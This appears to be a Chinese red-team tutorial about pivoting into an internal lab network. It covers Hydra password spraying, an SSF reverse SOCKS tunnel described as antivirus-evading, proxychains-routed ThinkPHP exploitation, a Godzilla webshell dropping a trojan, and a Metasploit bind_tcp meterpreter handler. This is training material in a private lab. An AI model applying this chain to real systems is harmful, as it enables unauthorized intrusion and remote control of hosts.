红队渗透-内网穿透-SSF内网穿透反向socks代理之渗透内网thinkphp主机上线msf

0.实际操作视频,请移步

https://www.bilibili.com/video/BV1zt4y1K7pT/

1 ssf 简介

Secure Socket Funneling  socks正反向代理,linux版较好的免杀

1.1下载地址

https://github.com/securesocketfunneling/ssf

1.2下载编译好的执行文件

https://github.com/securesocketfunneling/ssf/releases/tag/3.0.0

2.环境

kali 攻击机 网卡 桥接模式  ip 192.168.1.6

跳板机 centos 网卡1 桥接模式 ip 192.168.1.8  网卡2 仅主机模式 ip 10.10.10.88

目标机器 win2012 网卡 仅主机模式  10.10.10.13

3.ssf socks 反向代理

3.0 kali 上执行hydra 密码喷洒获取centos的账号密码

3.1. wegt https://github.com/securesocketfunneling/ssf/releases/download/3.0.0/ssf-linux-x86_64-3.0.0.zip

3.2 解压

unzip ssf-linux-x86_64-3.0.0.zip

3.3.kali上运行,监听1616端口

./ssfd -p 1616 &

3.4跳板机运行ssf ,链接kali的1616端口并且在kali上开启1080端口监听

./ssf -F 1080 192.168.1.6 -p 1616 &

4.代理工具proxychains的设

vi /etc/proxychains4.conf

socks5 127.0.0.1 1080

5.自身不支持代理的渗透工具可以用proxychains设置代理渗透内部网络

5.1 内网桌面链接rdesktop

proxychains rdesktop 10.10.10.13

5.2 burp通过proxychains代理渗透内网

proxychains java -jar burpsuite.jar

5.3 火狐等浏览器设置代理

Network Settings-》settings-》Manual proxy configuration-》SOCKS Host 填写kali ip地址 192.168.1.6,端口是1080

5.4thinkphp 利用工具

github 搜索 thinkphp 综合利用

5.5 启动 thinkphp.jar

#proxychains /usr/local/jdk1.8.0_301/bin/java -jar ThinkPHP.jar

5.6 启动哥斯拉,设置代理,管理shell上传正向木马,运行木马

5.7利用代理启动msf

proxychains msfconsole

5.8正向链接内网的木马

msf6 > use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set rhost 10.10.10.13

set lport 1616

run

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容